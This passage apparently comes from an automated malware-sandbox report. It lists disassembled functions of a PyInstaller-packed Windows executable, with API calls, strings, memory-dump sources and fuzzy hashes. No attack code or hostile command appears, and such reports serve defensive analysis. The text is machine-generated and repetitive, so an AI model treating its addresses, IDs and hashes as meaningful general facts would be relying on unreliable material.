                                                            • Instruction Fuzzy Hash: FC317072A09BC19AEB60AF64E8403FD3360FB84744F44403ADA4E87B95EF38D698D710
                                                            Function 00007FF6DD66ABD8 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                            • String ID:
                                                            • API String ID: 1239891234-0
                                                            • Opcode ID: 4ac1c30ff9e2098ff7eaac683efdfbba3e64979dbffe5e0d25534f02cf004e64
                                                            • Instruction ID: 3ab8f558afcaafc136de2b4fab44ed6aa7bb444b4c83f514fb934fb085b55740
                                                            • Opcode Fuzzy Hash: 4ac1c30ff9e2098ff7eaac683efdfbba3e64979dbffe5e0d25534f02cf004e64
                                                            • Instruction Fuzzy Hash: D7317432A18BC196DB60DF25E8402BE73A0FB84754F500136EA9D83B95EF3CD565DB80
                                                            Function 00007FF6DD671EE4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: FileFindFirst_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 2227656907-0
                                                            • Opcode ID: e601e72e586d0b4de4a5ebf73eb2eb015632a136167348e3e84c4a74a70f75b2
                                                            • Instruction ID: 719320c3835f8aab13872f0896e2f77051db9f52cdce07a5c9406249ec181c09
                                                            • Opcode Fuzzy Hash: e601e72e586d0b4de4a5ebf73eb2eb015632a136167348e3e84c4a74a70f75b2
                                                            • Instruction Fuzzy Hash: B2B1A222F186CA61EA60EF2198146BD6391FB48BD4F545133EA5D87E85FF3CE461E380
                                                            Function 00007FF6DD6551E0 Relevance: 233.1, APIs: 44, Strings: 89, Instructions: 363libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID: Failed to get address for PyConfig_Clear$Failed to get address for PyConfig_InitIsolatedConfig$Failed to get address for PyConfig_Read$Failed to get address for PyConfig_SetBytesString$Failed to get address for PyConfig_SetString$Failed to get address for PyConfig_SetWideStringList$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyPreConfig_InitIsolatedConfig$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PyStatus_Exception$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetObject$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_ExitStatusException$Failed to get address for Py_Finalize$Failed to get address for Py_InitializeFromConfig$Failed to get address for Py_IsInitialized$Failed to get address for Py_PreInitialize$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                            • API String ID: 190572456-4266016200
                                                            • Opcode ID: cf77275b4bf0387ff900e5ea28e17749df250fc4abdfb995cff073003fe970f9
                                                            • Instruction ID: 8d50d622943e8e6598fda34096dde47da720655ef49a764220c60cfd2af1b614
                                                            • Opcode Fuzzy Hash: cf77275b4bf0387ff900e5ea28e17749df250fc4abdfb995cff073003fe970f9
                                                            • Instruction Fuzzy Hash: BF12AA64E0AB87B0FA55EF08AC5817C22A1AF05750F855537C81EC66A5FF6CF5B8A3C0
                                                            Function 00007FF6DD6512B0 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 136COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: Message_fread_nolock
                                                            • String ID: %s%c%s$Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$\$fread$fseek$malloc
                                                            • API String ID: 3065259568-2316137593
                                                            • Opcode ID: 6fc5ac864f703c4be55e556062f1d4a856c1a5df9fca28c7911cf52acfa12488
                                                            • Instruction ID: 0fe441769afbeac6cf82441b997350f485a91df986b5fe5e14d58bec43ab1970
                                                            • Opcode Fuzzy Hash: 6fc5ac864f703c4be55e556062f1d4a856c1a5df9fca28c7911cf52acfa12488
                                                            • Instruction Fuzzy Hash: 0051B321E086C756EA20BB25A8506FE6394EF45784F404133EA4DC7B8AFE7CF595A3C0
                                                            Function 00007FF6DD6523F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                            • String ID: P%
                                                            • API String ID: 2147705588-2959514604
                                                            • Opcode ID: 7645c0c2d2fce03d3aab2d1fd33ee4a3925b53edade4cf92fedf68089910dc30
                                                            • Instruction ID: 4f4345e58f24669dafbb4ea2ff845b12d59c754ff279f9dfe58234a89b0e90a4
                                                            • Opcode Fuzzy Hash: 7645c0c2d2fce03d3aab2d1fd33ee4a3925b53edade4cf92fedf68089910dc30
                                                            • Instruction Fuzzy Hash: E251F926A147E186D6349F36E0181BEB7A1F798B61F004126EBDE83785DF3CD095DB10
                                                            Function 00007FF6DD658560 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 52windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,00007FF6DD652A5E,?,?,?,?,?,?,?,?,?,?,?,00007FF6DD65101D), ref: 00007FF6DD658587
                                                            • FormatMessageW.KERNEL32 ref: 00007FF6DD6585B6
                                                            • WideCharToMultiByte.KERNEL32 ref: 00007FF6DD65860C
                                                              • Part of subcall function 00007FF6DD6529E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6DD6587F2,?,?,?,?,?,?,?,?,?,?,?,00007FF6DD65101D), ref: 00007FF6DD652A14
                                                              • Part of subcall function 00007FF6DD6529E0: MessageBoxW.USER32 ref: 00007FF6DD652AF0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastMessage$ByteCharFormatMultiWide
                                                            • String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
                                                            • API String ID: 2920928814-2573406579
                                                            • Opcode ID: 6472fed7a38855fe53d018715946baf175a16c93e2266fbaa2446d02f1e91665
                                                            • Instruction ID: d763e01afc1578039f09a61ffbf5092f287dca39b297877d95556e2916661816
                                                            • Opcode Fuzzy Hash: 6472fed7a38855fe53d018715946baf175a16c93e2266fbaa2446d02f1e91665
                                                            • Instruction Fuzzy Hash: 29216071E08AC6A1F760AF15E84427D2364BF88384F840136D54DC3AA5FF3CE569EB80
                                                            Function 00007FF6DD6667A4 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: -$:$f$p$p
                                                            • API String ID: 3215553584-2013873522
                                                            • Opcode ID: c6ac63e3974c66327622d921c1304357062fd3cb2bcbfe9c56688102bfb98152
                                                            • Instruction ID: e80072ebf44998540e4430e99438c436dada83054138cd9120a8ba4bb08feecc
                                                            • Opcode Fuzzy Hash: c6ac63e3974c66327622d921c1304357062fd3cb2bcbfe9c56688102bfb98152
                                                            • Instruction Fuzzy Hash: F3128371E0C1C386FB207A95F1542BD76A5EB90754F8441B7E789866C4EF3CE4A4A7C0
                                                            Function 00007FF6DD661108 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: f$f$p$p$f
                                                            • API String ID: 3215553584-1325933183
                                                            • Opcode ID: 7160b50ef5c5d9843a5fd5f0d5cd643ebb1f382f7049b3f2f81a6a7c29ab944c
                                                            • Instruction ID: 7018cf42dd3b3b2fe3be431941396525b694175349d7768091d3069b461d1eda
                                                            • Opcode Fuzzy Hash: 7160b50ef5c5d9843a5fd5f0d5cd643ebb1f382f7049b3f2f81a6a7c29ab944c
                                                            • Instruction Fuzzy Hash: 63129262E0C1C386FB60BA15D0146BD7661FB90755F844177E69A876C8FF3DE8A0ABC0
                                                            Function 00007FF6DD6515A0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 99COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                            • API String ID: 2030045667-3659356012
                                                            • Opcode ID: 6b9a6c4333214f139a40b945d1f460a1e464d0b1d53d7e46c317f83f46444753
                                                            • Instruction ID: 2b64daff214fe62fc3ecb6fd9861f157b57f9acf08b34e640a46734cce1140f2
                                                            • Opcode Fuzzy Hash: 6b9a6c4333214f139a40b945d1f460a1e464d0b1d53d7e46c317f83f46444753
                                                            • Instruction Fuzzy Hash: 7131A021F486C796EE20BB55A8005BE63A0EF047C4F484533DE4D87A96FE3CF5A5A780
                                                            Function 00007FF6DD65EB00 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                            • String ID: csm$csm$csm
                                                            • API String ID: 849930591-393685449
                                                            • Opcode ID: 2b2a4badfdaa60d9abfb93841dcb65d735c0fc58e4118d1b5c2a51383b6331b7
                                                            • Instruction ID: 0fbdf6cc0a1a26d74bc0a779465f03863be8c344f1ed187152bbef61d7a45c74
                                                            • Opcode Fuzzy Hash: 2b2a4badfdaa60d9abfb93841dcb65d735c0fc58e4118d1b5c2a51383b6331b7
                                                            • Instruction Fuzzy Hash: C4E16E76E0878186EB20EBA594402BD77A0FB45798F104136EE4D97B97EF38E5E0D780
                                                            Function 00007FF6DD6586B0 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 104COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6DD65101D), ref: 00007FF6DD658747
                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6DD65101D), ref: 00007FF6DD65879E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide
                                                            • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                            • API String ID: 626452242-27947307
                                                            • Opcode ID: 880ff2e63ba81a384871d9a2b2c380e34ab45f047a7bf3c31ff76456a7931f4a
                                                            • Instruction ID: d187cf9ca1a099589168876414ad04584f944a0a27981a7f3e4822f41d8f87f3
                                                            • Opcode Fuzzy Hash: 880ff2e63ba81a384871d9a2b2c380e34ab45f047a7bf3c31ff76456a7931f4a
                                                            • Instruction Fuzzy Hash: 1E415132E0CAC282D620EF15B84017EA7A5FB84790F944536DA8D87F95EF3CE465A740
                                                            Function 00007FF6DD658BF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WideCharToMultiByte.KERNEL32(?,00007FF6DD6539EA), ref: 00007FF6DD658C31
                                                              • Part of subcall function 00007FF6DD6529E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6DD6587F2,?,?,?,?,?,?,?,?,?,?,?,00007FF6DD65101D), ref: 00007FF6DD652A14
                                                              • Part of subcall function 00007FF6DD6529E0: MessageBoxW.USER32 ref: 00007FF6DD652AF0
                                                            • WideCharToMultiByte.KERNEL32(?,00007FF6DD6539EA), ref: 00007FF6DD658CA5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$ErrorLastMessage
                                                            • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                            • API String ID: 3723044601-27947307
                                                            • Opcode ID: 93215b2962e715be9f5aa91d99be70836a612e16585fb8aee950a2577366c4a3
                                                            • Instruction ID: 549a9bf96d1b441b96efbf58218abdf5ca0c772d923c0bb2833269df3b04243a
                                                            • Opcode Fuzzy Hash: 93215b2962e715be9f5aa91d99be70836a612e16585fb8aee950a2577366c4a3
                                                            • Instruction Fuzzy Hash: 6A216F21E09B86E5EA10AF16A84007D7361FB84B80F944537DA4D87B96FF3CE5659780
                                                            Function 00007FF6DD6575A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 136COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo$_fread_nolock
                                                            • String ID: %s%c%s$ERROR: file already exists but should not: %s$PYINSTALLER_STRICT_UNPACK_MODE$WARNING: file already exists but should not: %s$\
                                                            • API String ID: 3231891352-3501660386
                                                            • Opcode ID: bcf1bab17151b9b867e8af5c18e0028d1d58eb22676ef18991cc143743397808
                                                            • Instruction ID: e6b1c1718e87dc8c90680083ed4e34b98c397ecdd68a2c0a42b37f917a38edb2
                                                            • Opcode Fuzzy Hash: bcf1bab17151b9b867e8af5c18e0028d1d58eb22676ef18991cc143743397808
                                                            • Instruction Fuzzy Hash: 5B519D24E0D6C351FA20BB25A9502BD62959F85B90F480533ED0DCB7DBFE6CE5A0A7C0
                                                            Function 00007FF6DD65DDB8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF6DD65E06A,?,?,?,00007FF6DD65DD5C,?,?,00000001,00007FF6DD65D979), ref: 00007FF6DD65DE3D
                                                            • GetLastError.KERNEL32(?,?,?,00007FF6DD65E06A,?,?,?,00007FF6DD65DD5C,?,?,00000001,00007FF6DD65D979), ref: 00007FF6DD65DE4B
                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF6DD65E06A,?,?,?,00007FF6DD65DD5C,?,?,00000001,00007FF6DD65D979), ref: 00007FF6DD65DE75
                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF6DD65E06A,?,?,?,00007FF6DD65DD5C,?,?,00000001,00007FF6DD65D979), ref: 00007FF6DD65DEBB
                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF6DD65E06A,?,?,?,00007FF6DD65DD5C,?,?,00000001,00007FF6DD65D979), ref: 00007FF6DD65DEC7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                            • String ID: api-ms-
                                                            • API String ID: 2559590344-2084034818
                                                            • Opcode ID: fa40dd5a34ae4d0b6736a9b6b46f8404287a490a05e4db78c585315ae40f634e
                                                            • Instruction ID: e82b7d213c7b3b6531e44803b0ed46d2e824f828232405c8d6d859dd52064b94
                                                            • Opcode Fuzzy Hash: fa40dd5a34ae4d0b6736a9b6b46f8404287a490a05e4db78c585315ae40f634e
                                                            • Instruction Fuzzy Hash: 1931C221E1A6C291EE21FF06A80057D2394BF58BA0F590536DE1D8B792FF3CE4B09780
                                                            Function 00007FF6DD657420 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 88COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00007FF6DD658AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6DD652ABB), ref: 00007FF6DD658B1A
